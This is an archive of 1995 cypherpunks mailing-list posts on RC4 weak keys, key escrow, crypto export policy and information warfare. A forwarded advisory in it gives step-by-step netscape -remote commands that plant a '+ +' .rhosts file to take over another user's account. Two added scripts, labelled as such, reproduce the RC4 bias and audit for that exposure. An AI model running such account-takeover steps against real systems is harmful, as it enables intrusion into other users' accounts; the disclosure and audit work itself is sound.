15. The risks involved in the development and application of information
technology with regard to the commission of criminal offenses should be
assured continuously. In order to enable the competent authorities to keep
abreast of new phenomena in the field of computer related offenses and to
develop appropriate counter-measures, the collection and analysis of data
on these offenses, including modus operandi and technical aspects, should
be furthered.

16. The establishment of specialised units for the investigation of
offenses, the combating of which requires special expertise in information
technology, should be considered. Training programmes enabling criminal
justice personnel to avail themselves of expertise in this field should be
furthered.


VII. International Cooperation 
------------------------------

17. The power to extend a search to other computer systems should also be
applicable when the system is located in a foreign jurisdiction, provided
that immediate action is required. In order to avoid possible violations
of state sovereignty or international law, an unambiguous legal basis for
such extended search and seizure should be established. Therefore, there
is an urgent need for negotiating international agreements as to how, when
and to what extent such search and seizure should be permitted.

18. Expedited and adequate procedures as well as a system of liaison should
be available according to which the investigating authorities may request
the foreign authorities to promptly collect evidence.  For that purpose
the requested authorities should be authorized to search a computer system
and seize data with a view to its subsequent transfer.  The requested
authorities should also be authorized to provide trafficking data related
to a specific telecommunication, intercept a specific telecommunication or
identify its source. For that purpose, the existing mutual legal
assistance instruments need to be supplemented.



_________________________________________________________________________
Subject: COE Document
_________________________________________________________________________
David Banisar (Banisar@epic.org)        *  202-544-9240 (tel)
Electronic Privacy Information Center   *  202-547-5482 (fax)
666 Pennsylvania Ave, SE, Suite 301     *  HTTP://www.epic.org
Washington, DC 20003                    *  ftp/gopher/wais cpsr.org 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Roos <AndrewR@beetle.vironix.co.za>
Date: Fri, 29 Sep 95 04:02:31 PDT
To: "'cypherpunks@toad.com>
Subject: Cryptanalysis of RC4 - Preliminary Results (Repeat)
Message-ID: <306BD292@beetle.vironix.co.za>
MIME-Version: 1.0
Content-Type: text/plain



(This is a repeat because I posted the original 36 hours ago and it still   
hasn't bounced back to me.)


 -----BEGIN PGP SIGNED MESSAGE-----

Hi c'punks & sci.cryptites


About a week ago I posted a message about weak keys in RC4. This is
an update on the results of my continued 4am sessions with RC4 and
shows that certain weak keys lead to an almost-feasible known
plaintext attack on the cipher (well, about as feasible as the
differential attack on DES, shall we say).

The attack is based on two particularly interesting three-byte key
prefixes which have a high probability of producing PRNG sequences
which start with a known two-byte sequence. The prefixes are:

1.  Keys starting with "00 00 FD" which have a 14% probability of
    generating sequences which start "00 00".

2.  Keys starting with "03 FD FC" which have a 5% probability of
    generating sequences which start "FF 03".

Note that the expected frequency of any two-byte output sequence is
1 in 65536 or about 0.0015%, so these key prefixes are highly
unusual. I won't go into the reasons why in this post, since it
follows the same reasoning as my last post, but these prefixes are
special in that they have a high probability of initializing the RC4
state table in such a way that the first two generated bytes depend
only on the first three entries in the state table.

This observation is the basis for a simple known-plaintext attack
which reduces the effective key space which you need to search to
have a 50% probability of discovering a key by about 11.2 bits. The
down side is that you need "quite a few" known plaintexts to make the
attack feasible.

It works as follows:

1.  Collect a large number of known plaintexts (and hence known
    generator sequences).

2.  Discard generator sequences which do not start with "00 00" or
    "FF 03".

3.  For generator streams starting "00 00", search all keys which
    begin with "00 00 FD".

4.  For generator streams starting "FF 03", search all keys which
    begin with "03 FD FC".

5.  Keep going until you find a key :-)

Clearly this attack will only discover a small fraction of the keys.
However since most generator sequences are discarded without being
searched, and for those which are searched the search is 2^24 smaller
than would be required to search the entire keyspace, the number of
trials required to determine a key is significantly lower than for
brute force alone.

Enough of an intro, here are the relevant results. Forgive my
simplistic approach to maths, I'm a philosopher-come-software
developer, not a mathematician. I've run the relevant simulations
with 40-bit, 64-bit, 80-bit and 128-bit key lengths, and with two
different PRNGs. For the sake of consistency with my earlier paper
I'll use the figures gathered for 80-bit keys (this seems to be RSA's
preferred key length for RC4), but there are no significant
differences for other key lengths. The PRNG used for these tests was
L'Ecuyer's 32-bit combined linear congruential generator as described
in "Applied Cryptography" p. 349.

(a) Out of one million trials, keys starting with "00 00 FD"
    generated sequences starting "00 00" 138217 times, and keys
    starting with "03 FD FC" generated output sequences starting "FF
    03" 50490 times.

(b) Out of ten million trials, arbitrary pseudo-random keys generated
    sequences starting with "00 00" 446 times, and sequences starting
    with "FF 03" 146 times. (Note the abnormally high incidence of
    "00 00"; the expected mean is 152.8).

Suppose we have the output stream generated by a randomly chosen key.
The chance that it will start with either "00 00" or "FF 03", and
that we will therefore search it, is:

    (446 + 146) / 1e7 = 5.92e-5

The chance that it starts with "00 00" and was generated by a key
starting with "00 00 FD", or that it starts with "FF 03" and was
generated by a key starting "03 FD FC" - i.e. the chance that we will
search it and be rewarded for our efforts - is:

    (138217 + 50490)/(1e6 * 2^24) = 1.12e-8

The total number of plaintexts required for a 50% chance that we will
discover one of the keys is:

    log(0.5)/log(1 - 1.12e-8) = 61 900 000

Well I did say "quite a few" plaintexts would be necessary :-)

And the number of plaintexts which you expect to search in order to
find the "right" one is:

    61 900 000 * 5.92e-5 = 3665

Since the total key length is 80 bits, and we are "guessing" 24 of
these, each search requires 2^56 trials. Hence the total number of
trials for a 50% chance of discovering a key is:

    3665 * 2^56 = 2.64e20 = 2 ^ 67.8

Since brute search alone would require 2^79 trials for a 50% chance
of determining the key, this reduces the number of trials by 2^11.2.

The results are essentially identical for all the key lengths I have
tried, and in each case reduce effective key length by about 11.2
bits. So, for example, a 64-bit key would normally require 2^63
trials for 50% chance of solution; this attack reduces the number of
trials to 2^51.8 at the cost of requiring 62 million known plaintexts.

I'm still running simulations to check my maths, and although initial
results are encouraging, I don't have enough data for it to be
statistically relevant yet (generating all these sets of 62 million
known streams takes time...) So consider this preliminary (again),
and I'll post the results of my simulations when I have enough
data.


Andrew

________________________________________________________________
Andrew Roos <andrewr@vironix.co.za>

// C++ programmers have class (but not much inheritance)

PGP Fingerprint: F6 D4 04 6E 4E 16 80 59 3A F2 27 94 8B 9F 40 26
Full key at ftp://ftp.vironix.co.za/PGP-keys/AndrewRoos


 -----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMGrlfmatuqa4OR+lAQF1eQP+IBBmSztAYUpq1q/BjzvYDCbb+Ns0Gi1S
u9wTaZOCl32fdp7NSUEQBX39nVJkQZginug56BZXzijRvOx6fl4+z7dmW9jwtE5E
YNCOhx+/fHX4psszMyEUTrnza7MYDc4HXlgv743LOD/xvEyU0D5OGgB5fg+lyhAK
6xQ/Zy8JpE8=
=BdMn
 -----END PGP SIGNATURE-----
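
The bias reported in the post above can be reproduced in a few seconds. The following is an added example, not part of the original post and not Andrew Roos's code: it assumes 10-byte (80-bit) keys as in the post, uses Python's `random` in place of L'Ecuyer's generator, runs 10,000 trials per prefix instead of a million, and all function names are chosen here for illustration.

```python
"""Measure the RC4 first-two-byte bias for the two key prefixes in the post."""
import math
import random


def rc4_ksa(key: bytes) -> list:
    """Standard RC4 key schedule: returns the 256-entry state table."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4_first_bytes(key: bytes, n: int = 2) -> bytes:
    """First n keystream bytes produced by RC4 under `key`."""
    s = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def prefix_hit_rate(prefix: bytes, expected: bytes, key_len: int = 10,
                    trials: int = 10_000, seed: int = 1995) -> float:
    """Fraction of random keys with `prefix` whose keystream starts `expected`."""
    rng = random.Random(seed)          # fixed seed: repeatable measurement
    tail = key_len - len(prefix)
    hits = 0
    for _ in range(trials):
        key = prefix + bytes(rng.getrandbits(8) for _ in range(tail))
        if rc4_first_bytes(key) == expected:
            hits += 1
    return hits / trials


def predicted_rate(entries_that_must_survive: int) -> float:
    """Approximation added here (not from the post): after the three prefix
    steps, 253 key-schedule steps remain, each swapping with a roughly uniform
    index j. The output pair survives if j never lands on the state entries
    the first two output bytes read."""
    return (1 - entries_that_must_survive / 256) ** 253


def work_factor(p_search: float, p_reward: float,
                key_bits: int = 80, guessed_bits: int = 24):
    """Carry the post's arithmetic through: returns (known plaintexts needed
    for a 50% chance, log2 of total trial decryptions)."""
    plaintexts = math.log(0.5) / math.log1p(-p_reward)
    searched = plaintexts * p_search   # streams that pass the two-byte filter
    return plaintexts, math.log2(searched) + (key_bits - guessed_bits)


if __name__ == "__main__":
    # Prefix 00 00 FD leaves S[1]=1, S[2]=0; both output bytes read only those.
    r1 = prefix_hit_rate(bytes.fromhex("0000fd"), bytes.fromhex("0000"))
    # Prefix 03 FD FC leaves S[0]=3, S[1]=1, S[2]=255; three entries are read.
    r2 = prefix_hit_rate(bytes.fromhex("03fdfc"), bytes.fromhex("ff03"))
    print(f"00 00 FD -> 00 00: measured {r1:.4f}, predicted {predicted_rate(2):.4f}")
    print(f"03 FD FC -> FF 03: measured {r2:.4f}, predicted {predicted_rate(3):.4f}")

    # Counts quoted in the post: (446 + 146) of 1e7 random keys pass the
    # filter; (138217 + 50490) of 1e6 prefixed keys produce the expected pair.
    n, bits = work_factor((446 + 146) / 1e7, (138217 + 50490) / (1e6 * 2**24))
    print(f"known plaintexts: {n:.3g}, trials: 2^{bits:.1f} (brute force: 2^79)")
```

The measured rates depend on how many state entries the first two output bytes read, which is why the first prefix hits far more often than the second; the same bias is the reason protocols that used RC4 were advised to discard the start of the keystream.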




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Fri, 29 Sep 95 10:28:47 PDT
To: cypherpunks@toad.com
Subject: Info War Comes Home
Message-ID: <199509291728.NAA27408@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


[Note:  Whenever I do one of my longer pieces, it seems to drop into the
void.  Perhaps they are so well written and complete that no one can think
of any comment to make on them.  Perhaps not.  Read this one and comment.
You won't regret it.]

In honor of the Second Annual Conference on Information Warfare a few
weekends ago, here is my proposal towards a paper to be presented at next
year's conference.

*************************************************************************

                              The Mesh in the 'Hood


If any of you have not read every word of The Economist's Survey of Defence
Technology - "Softwar" in the June 10, 1995 issue --- shame on you.  Do so
immediately.

In that report, there is the following description of the future battlefield
without platforms (ships, aircraft, armor).  AKA the Mesh.

The Mesh is a network imposed over a landscape (what used to be called a
battlefield).  The network of sensors, smart munitions, small attack
modules, and perhaps human troops, shares information and kills enemies
moving through it.  Friendly forces travel through it as if it weren't
there.  It is "flat."  Hills and valleys disappear and expensive platforms
[tanks, helicopters, etc.] have nowhere to hide since it is co-extensive
with the whole territory it covers.  It is also tough because it is hard to
destroy enough parts of it to make a difference.  Nuclear munitions might
destroy a Mesh or imposing a stronger Mesh over an existing one might work
if you didn't mind wholesale destruction but defeating it without massive
destruction is hard.

To quote from the Survey:

"The mesh has a number of advantages. It is hard to attack, because its
strength is spread widely. It is hard to damage, because there are so many
communication paths. Many small sensors can provide a better picture than a
few large ones. More sensors allow the information domain to conform more
closely to the physical terrain. At the moment line-of-sight detection by
sensors in a widespread network leaves topographical blind spots--wadis,
narrow valleys--in which platforms such as attack helicopters can lurk."

"While nets may see through the fog of war, meshes also tackle another of
the problems von Clausewitz identified; war's friction. The mesh is a
war machine with almost no moving parts, save the actual warheads of the
weapons. It is a solid-state device; its mechanisms have migrated far
into the spectral dimension of information, leaving only a thin skeleton
framework in the world of height, breadth and depth."

It certainly makes for a challenging war environment.  The Mesh is created
by warriors to effectively serve warriors' ends.  I would like to suggest the
possibility that civilians might create their own Mesh to serve their ends.

A Mesh is Just a Net with Attitude

The Internet is (as we all know) a network of interconnected computers that
cooperate to exchange information in a standardized fashion.  Its purpose is
communication.  If its purpose is extended, it can become a Mesh.

Assume that the Net has grown in size and importance so that a significant
portion of the population in a given geographic area is fully wired ---
hardly a dramatic assumption.

All of those machines are cooperating to enable the various sorts of
communications that people want to use the Net for.  Some of those machines
are already connected to external cameras to do "silly" things like put
pictures of Stockholm on the WWW.

What if people connected other things to the Net?

While it is unlikely that most people will put a chain gun in the window and
interface it with the Net anytime soon, other useful connections are possible.  

[And even in the case of weaponry, specific neighborhoods might be
interested in doing creative things now.  Thus Bo Gritz' heavily armed,
Patriot, Recreational Subdivision in Idaho might find a use for the Mesh.
And won't those Black Helicopters be surprised.]   

More peaceful civilians might deploy a Mesh to protect themselves against
bad people whether official or unofficial.  Like the existing Speedtrap website 
(http://www.nashville.net/speedtrap/) but in real time, cameras and passive
sensors could track the minions of the State as they cruise through
neighborhoods.  They could also multicast live, full color, and audio images
of arrests and less formal interactions with the authorities.  Fans of
Robert Heinlein will recall that Jubal Harshaw used a version of this
strategy in "Stranger in a Strange Land."  Cops behave better when they are
on camera (and know it.)  The Net allows everyone to play.   

END OF PART I  (More next week).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bwern@jax.jaxnet.com (Ben Wern)
Date: Fri, 29 Sep 95 11:02:11 PDT
To: cypherpunks@toad.com
Subject: HP Lobbies for Exportable Crypto
Message-ID: <199509291809.OAA13405@jax.jaxnet.com>
MIME-Version: 1.0
Content-Type: text/plain


From the 28th of September's EDUPAGE:


HP LOBBIES FOR EXPORTABLE ENCRYPTION PLAN
Hewlett-Packard has developed an encryption strategy with the French
company Gemplus SCA that they're hoping will pass the tough scrutiny of
U.S. export controllers.  The plan takes a two-pronged approach -- an
"encryption engine" that works in conjunction with a code-making formula
that can be adjusted to any level deemed acceptable by the U.S. government,
and a policy card that would be reviewed on a case-by-case basis by the
State Department. The flexible system is designed to adapt to changing
government policies, and could even accommodate a key escrow system like the
Clipper chip. "There was a lot of skepticism when HP first proposed it.  But
it looks to me that they are well on the way to the next step," says a
former encryption specialist at the National Institute of Standards and
Technology.  (Wall Street Journal 27 Sep 95 B7)



Ben Wern
bwern@jaxnet.com | bwern@pathtech.com | bwern@unf.edu
                            SAY NO TO TALKING COWS!
     -------------------------------------------------------------------------
      "We are more than the sum of our knowledge, we are
                       the products of our imagination." 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Censored Girls Anonymous)
Date: Fri, 29 Sep 95 12:11:22 PDT
To: cypherpunks@toad.com
Subject: This fax list is 95% accurate!
Message-ID: <199509291911.MAA13112@usr1.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Sorry the whole HTML is here,
however, if you now want to 
make "A CYPHERPUNK SPEAKS....."
Press Release, this fax list 
will do it for you, only two
or three numbers are unverified!
(and that's as of today!)


<html>

<head>
<title>
Fearless Fax Numbers Revised 9-29-95
</title>
</head>
<center>
<h1>Transgender Lobby Days Website</center>
</center>
<pre>

I promised last week that I would send this out when the idea of a
blanket-fax-campaign for a c-punks press release was being discussed.
Sorry it took me so long to get around to it, but here it is.
I was mistaken in my original posting:  it includes neither the Fox Network
_nor_ the Eye on America show, but I'm sure we'll find those numbers
somewhere.

I got it from the Iron Feather Journal, volume 14.  I have no reason to
believe that any of these numbers are incorrect, but some of them may
have changed.

Also:  personal apologies to anyone who considers this to be noise.  Please
restrict all flames to private e-mail.

Anybody wanna fax Ted Turner?  :)

ABC 20/20	    NY			1-212-456-2969
Ann Arbor News	    Ann Arbor, MI	1-313-994-6879
AP		    Los Angeles		1-213-748-1200
AP		    San Diego		1-619-291-2098
AP (Broadcast)      Washington, D.C.    1-202-955-7367
Associated Press    Los Angeles         1-213-748-9836  Steve Loeper
Associated Press    Phoenix, AZ 	1-602-254-9573  Assignment Editor
Associated Press    San Francisco	1-415-552-9430  Bill Schiffmann
Associated Press MN Minneapolis, MN	1-612-332-4245
Boston Phoenix	    Boston, MA		1-617-536-1463
Boulder Daily Camera Boulder, CO	1-303-442-1508
C-SPAN		    Washington, D.C.    1-202-737-6226  Sarah Traheorn
CBS		    Washington, D.C.    1-202-659-2586
CBS (Radio)	    Washington, D.C.    1-202-659-5578
CBS Eve News	    NY			1-212-975-2115
CBS Morning	    Washington, D.C.    1-202-331-1765
CBS News	    Los Angeles		1-213-651-0285  Jennifer Siebens
CBS News	    San Francisco	1-415-362-7417  John Blackstone
CBS TV		    Los Angeles		1-213-651-0321
CBS TV 		    San Francisco	1-415-362-7417
Chicago Sun-Times   Chicago, IL    	1-312-321-3084
Chicago Tribune     Chicago, IL		1-312-222-3143
CNN		    San Francisco       1-415-398-4049
CNN President	    Atlanta, GA		1-404-827-1575  Ted Turner
Coloradoan	    Fort Collins, CO	1-303-224-7726
Denver Post	    Denver, CO		1-303-820-1369
Der Spiegel	    Hollywood, CA	1-213-851-9867  Frances Schoenberg
Detroit News	    Detroit, MI		1-313-222-2335
ESPN		    Bristol CT		1-800-592-3776
Gannett	  	    Washington, D.C.	1-202-243-0190
Gannett News Service Sacramento, CA	1-916-446-7326  Becky Lavally
KFAN AM	     Minneapolis		1-612-820-4265
Kostabi Media		New York	1-212-925-3055
Mother Jones	    San Francisco, CA	1-415-863-5136  Douglas Foster
NBC		    Washington, D.C.	1-202-362-2009
NBC News	    Burbank, CA		1-818-840-4275  Heather Allan
NBC News President New York NY	1-212-315-4037
NBC TV	  	    Los Angeles		1-818-840-4275
Newsweek	    Washington, D.C. 	1-202-783-6512
NPR Radio	    San Francisco, CA	1-415-553-2241
NY Times	    New York, NY	1-212-556-4603
PBS		    Alexandria, VA	1-703-739-0775
Pulse! 		    West Sacramento, CA 1-916-373-2480  Laurie Macintosh
Rainbow Coalition   Washington, D.C. 	1-202-728-1192
Reuters             Los Angeles		1-213-622-0056
Rocky Mountain News Denver, CO		1-303-892-5499
Scripps Howard	    Washington, D.C.	1-202-408-8116
Shareware Magazine  Sunnyvale, CA	1-602-839-2872  Tracy Stephenson
Sports Fan Radio Net  Las Vegas NV      1-702-737-1906
Time	 	    San Francisco, CA	1-415-434-5209  Paul Witteman
Time Magazine	    NY			1-212-522-0451
UPI		    Boston, MA		1-617-338-9774  Barry Fly
UPI		    Los Angeles		1-213-620-1237
UPI		    San Francisco	1-415-552-3585  Bill Bucy
UPI		    Seattle, WA		1-206-283-0408  Penny Spar
UPI		    Washington, D.C.    1-202-789-2362
UPI (Radio)	    Washington, D.C.    1-202-842-3625
US News & Wrld Rprt Washington, D.C.    1-202-955-2713
USA Today	    Washington, D.C.	1-202-955-2049
Utne Reader	    Minneapolis, MN	1-612-338-6043
Whole Earth Review  Sausalito, CA	1-415-332-2416  Kevin Kelly


kelli@zeus.towson.edu       Geek Code v3.0      http://zeus.towson.edu/~kelli/
GAT dx s++:- a-- C++ uu+++ P+ L++ E- W++ N K W--- O- M- V-- PS+++ PE- Y++(-)>
PGP+>++ t+ 5 x+ R tv b+++ DI- D--- G e h* r+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu

"All the world will be your enemy, Prince With The Thousand Enemies. . .
And whenever they catch you, they will kill you.
But first, they must catch you. . ."
                                           -Richard Adams

</pre>
carolann@censored.org
</html>
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Fri, 29 Sep 95 11:41:12 PDT
To: cypherpunks@toad.com
Subject: Re: Netscpae & Fortezza (Or, say it Ain't so, Jeff?)
In-Reply-To: <199509290659.XAA09185@ix7.ix.netcom.com>
Message-ID: <9509291841.AA29412@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain


>I for one am against any kind of GAK on moral grounds.  I also think
>that trying to implement mandatory GAK in a software only system
>would be a nightmare.

If people care to look at my very old Shen work they will see a key
escrow facility. This was installed because as a network administrator
at a sensitive site.

I'm a big fan of key escrow. I just don't think I should be forced to 
use it on a public network by a government. I need the ability to secure 
internal channels inside certain sites however. I don't think I want the 
Whitehouse running with each staffer providing their own personal encryption 
system.


	Phill.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark <mark@lochard.com.au>
Date: Thu, 28 Sep 95 23:32:30 PDT
To: asgaard@sos.sll.se (Mats Bergstrom)
Subject: Re: "Notes" to be Eclipsed by "Netscape"
In-Reply-To: <Pine.HPP.3.91.950928205053.16699C-100000@cor.sos.sll.se>
Message-ID: <199509290423.AA52917@junkers.lochard.com.au>
MIME-Version: 1.0
Content-Type: text


>person for Hewlett-Packard (about the HP internal net with 19
>worldwide connections to the Internet - by the way, allegedly
>no one has ever succeeded in breaking their firewalls)

I am unable to discuss the details of this (so don't ask), but HP's firewall
was breached way back in the early 90's. The breach was not discovered, more
upgraded over so I am unsure as to whether it is still open.

Blanket statements such as company X or firewall Y not being breached are
almost always false. One anecdote is a domain installed a firewall but didn't
bother to examine their internal hosts security. This was a mistake because
a number of hosts were *already* trojaned so an outsider could trigger the
mechanisms to allow entry seamlessly through the firewall. This is a good
argument for keeping OS versions current.

Have a nice day.

Mark
mark@lochard.com.au
The above opinions are rumoured to be mine.



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 29 Sep 95 15:26:06 PDT
To: cypherpunks@toad.com
Subject: Re: worldwide announce: New OTP Mail/FTP apps
In-Reply-To: <doug-9508291335.AA00652565@netman.eng.auburn.edu>
Message-ID: <199509292225.PAA25735@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> Doug Hughes <Doug.Hughes@Eng.Auburn.EDU> writes:
> It seems to be a OTP/stream cipher of some kind.. subsequent number depending
> on previous numbers. I don't know if its possible to prove that the sequence
> will never repeat, having not seen the algorithm. But if it did not, it would
> seem to be strong enough. Too many questions, too few answers.

It does seem to be a stream cipher of some kind.  Subsequent numbers
depending on previous numbers means that it's an autokey cipher.  That
most assuredly does <not> make it a one time pad, no matter whether it
ever repeats or not (which it presumably wouldn't).

Here's an easy way to demonstrate that the strength of this system is less
than a one time pad.  Let's give the attacker all the breaks: he knows the
initial secret key, he has watched the key exchange from both sides by
monitoring all keystrokes, and has access to all the keying information
and plaintext and ciphertext that has happened from day 0 until now, day
30, but none of the plaintext or other keying information thereafter.

Case one: the system you're flogging.  He can keep reading the mail.
Case two: a true one time pad.  He immediately loses touch with the system
          as soon as they go to the first unknown byte of the one time
          pad.

I sympathize with their desire to call it a one time pad, since that has
obvious marketing cachet.  But it isn't -- can't they simply say they
think it's a nice strong cipher?

	Jim Gillogly
	Sterday, 8 Winterfilth S.R. 1995, 22:21




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Fri, 29 Sep 95 12:37:11 PDT
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Info War Comes Home
In-Reply-To: <199509291728.NAA27408@panix.com>
Message-ID: <Pine.SUN.3.91.950929145750.9935A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 29 Sep 1995, Duncan Frissell wrote:

> [Note:  Whenever I do one of my longer pieces, it seems to drop into the
> void.  Perhaps they are so well written and complete that no one can think
> of any comment to make on them.  Perhaps not.  Read this one and comment.
> You won't regret it.]
> 
> In honor of the Second Annual Conference on Information Warfare a few
> weekends ago, here is my proposal towards a paper to be presented at next
> year's conference.

A couple of things jump to mind:

Though I know you only used War as a metaphor, even that rubs me the
wrong way.  I don't like wars or people who fight them--namely States,
bullies (BIG bullies), and other Territorial Gangsters.  It's an
authoritarian, hierarchical model, even though I realize you're using
it loosely.  Your piece is very short on details, but the few you give
all employ the War metaphor: "neighborhood defense," sensors, video
cameras, etc.

I have no problem with some of these things per se, especially if
they're targeted against the State, but I also have no interest in
living in a kind of permanent war zone.  This strikes me as a negative
approach versus the more positive approach of, say, mutual assistance
groups like the "tong."  (Hakim Bey wrote an excellent essay on tongs
and their applicability to modern anarchist groups, btw.  If anyone's
interested, send me an email message with subject "TONG PLEASE" and
it'll be sent to you automatically.)

Anyone attracted by the idea of urban warfare should read Mike Davis's
excellent "City of Quartz."  He's talking about the modern city
(specifically, L.A.) as a war zone pitting _haves against have-nots,_
but the idea is the same, and it's scary as hell.

I'm ambivalent, to say the least, about the mania for getting
everything in the world WIRED, but if you want to convince me you'll
have to come up with a model that offers me something _constructive._

Cheers.

   --Dave.

--
Dave Mandl
dmandl@panix.com
http://wfmu.org/~davem




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jyri Kaljundi <jk@digit.ee>
Date: Fri, 29 Sep 95 06:59:39 PDT
To: cypherpunks@toad.com
Subject: Netscape hole without .Xauthority (fwd)
Message-ID: <Pine.3.89.9509291503.A1295-0100000@jamarillo>
MIME-Version: 1.0
Content-Type: text/plain



Haven't seen this on the cypherpunks yet, sorry if this has been here 
already. 

Juri

<o       Jri Kaljundi          e-mail: jk@digit.ee         o<
 >o                             tel: +372 6308994            o>
<o       DigiTurg               http://www.digit.ee/        o<

---------- Forwarded message ----------

There's a huge hole in the Netscape remote control mechanism for the
X-Windows based clients. 
Potential impact : anybody can become any user that uses Netscape on any
system without sufficient X security.

Let's suppose that you have an account on a target machine, where somebody
is using Netscape, and either the xhost checking is disabled, or you can
set the xhost yourself (e.g. if you have an account and the target user has
no .Xauthority, as is frequent in university computer rooms).
Then you can gain access to the target user's account using the following
steps :

- make a text file containing only "+ +" accessible (as file, as URL, or
  whatever you like) to the target Netscape client. This is quite easy, either
  if you have a personal WWW page (http://... URL) or an account on the
  target machine (file://... URL), or even by uploading it to an anon FTP

- set your DISPLAY environment variable to the target display

- run the following set of commands :

  netscape -noraise -remote "openURL(<put-your-URL-here>)"
  netscape -noraise -remote "saveAs(.rhosts)"
  netscape -noraise -remote back

In the second command, the path should be specified whenever possible 
(~ is not accepted).

If the target user does not already have a .rhosts and is not looking at that
precise moment, then the chances are it worked !

Solution to the problem : every user concerned should either create a 
Xauthority file, or stop using Netscape.

	MXK


PS: WHY do they bother with PGP and RSA security when they keep such holes ????

+------------------------------------+---------------------------------+
|  Denis AUROUX  (MXK)               | Ecole Normale Superieure        |
|  255 rue Saint-Jacques             | 45 rue d'Ulm                    |
|  75005 PARIS FRANCE                | 75005 PARIS                     |
|  email: auroux@clipper.ens.fr      | FRANCE                          |
+------------------------------------+---------------------------------+
| This .sig is SHAREWARE. If you use it often, please send me $50.     |
| After registering you will receive a fully functional .sig and all   |
| updates for free.                                                    |
+----------------------------------------------------------------------+
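
A defender's check for the three conditions the forwarded advisory above relies on (open or host-based xhost access, a missing .Xauthority, and wildcard .rhosts entries), as an added example that is not part of the original post. The function names and the sample inputs are constructed for illustration; on a real host the first argument would be the output of `xhost` and the third the contents of the user's `.rhosts`.

```python
"""Audit an X display and .rhosts file for the exposure described above."""


def parse_xhost(output: str):
    """Split `xhost` output into (access_control_disabled, access_list)."""
    lines = [ln.strip() for ln in output.splitlines() if ln.strip()]
    disabled = bool(lines) and "access control disabled" in lines[0].lower()
    return disabled, lines[1:]


def risky_rhosts_lines(text: str):
    """Return (line_number, reason) for every wildcard trust entry.

    An .rhosts line is "host [user]"; a "+" in either field is a wildcard.
    Lines starting with "#" are treated as comments here.
    """
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        host = fields[0]
        user = fields[1] if len(fields) > 1 else None
        if host == "+" and user == "+":
            findings.append((n, "any user from any host"))
        elif host == "+":
            findings.append((n, "any host"))
        elif user == "+":
            findings.append((n, "any user on " + host))
    return findings


def audit_display(xhost_output: str, xauthority_exists: bool, rhosts_text: str):
    """Collect human-readable findings; an empty list means none of the
    conditions named in the advisory were seen."""
    findings = []
    disabled, entries = parse_xhost(xhost_output)
    # Server-interpreted per-user entries (SI:...) do not open the display
    # to every account on a host, so they are not flagged.
    host_based = [e for e in entries if not e.startswith("SI:")]
    if disabled:
        findings.append("xhost: access control disabled; any client can "
                        "send remote commands to this display")
    elif host_based:
        findings.append("xhost: host-based access for " + ", ".join(host_based)
                        + "; every account on those hosts can connect")
    if not xauthority_exists:
        findings.append(".Xauthority: missing; no per-user cookie protects "
                        "the display")
    for n, reason in risky_rhosts_lines(rhosts_text):
        findings.append(".rhosts line %d: trusts %s" % (n, reason))
    return findings


if __name__ == "__main__":
    # Constructed sample: a shared lab machine in the state the advisory warns of.
    sample_xhost = "access control disabled, clients can connect from any host\n"
    sample_rhosts = "# constructed sample\n+ +\n"
    for finding in audit_display(sample_xhost, False, sample_rhosts):
        print(finding)
```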





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 29 Sep 95 16:27:27 PDT
To: cypherpunks@toad.com
Subject: Web "places" and the media monsters
Message-ID: <199509292319.QAA21372@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



below is an interesting excerpt from Boardwatch magazine, which I find
to be a good source for internet/web/BBS coverage. it talks about how
the Web, to continue its momentum, may evolve into something like
BBSes that give the sense of an online community..

also, I recently read a chapter from an upcoming book, I think it was
by Negroponte, and he pointed out how the web/gopher servers did not
really explode until the introduction of Mosaic and an *image* standard
was put into HTML. (to this I would add forms capability-- buttons, etc.)
This suggests that the success of the Web is really highly predicated
on the easy-to-use interface of Web browsers, and the nice visual presentation
given by images etc.  in other words, the "hypertext" capabilities, while
tremendous, were not necessarily the *key* factors in driving its use, but
when coupled with these other ingredients, really pushed it all "over the
top".

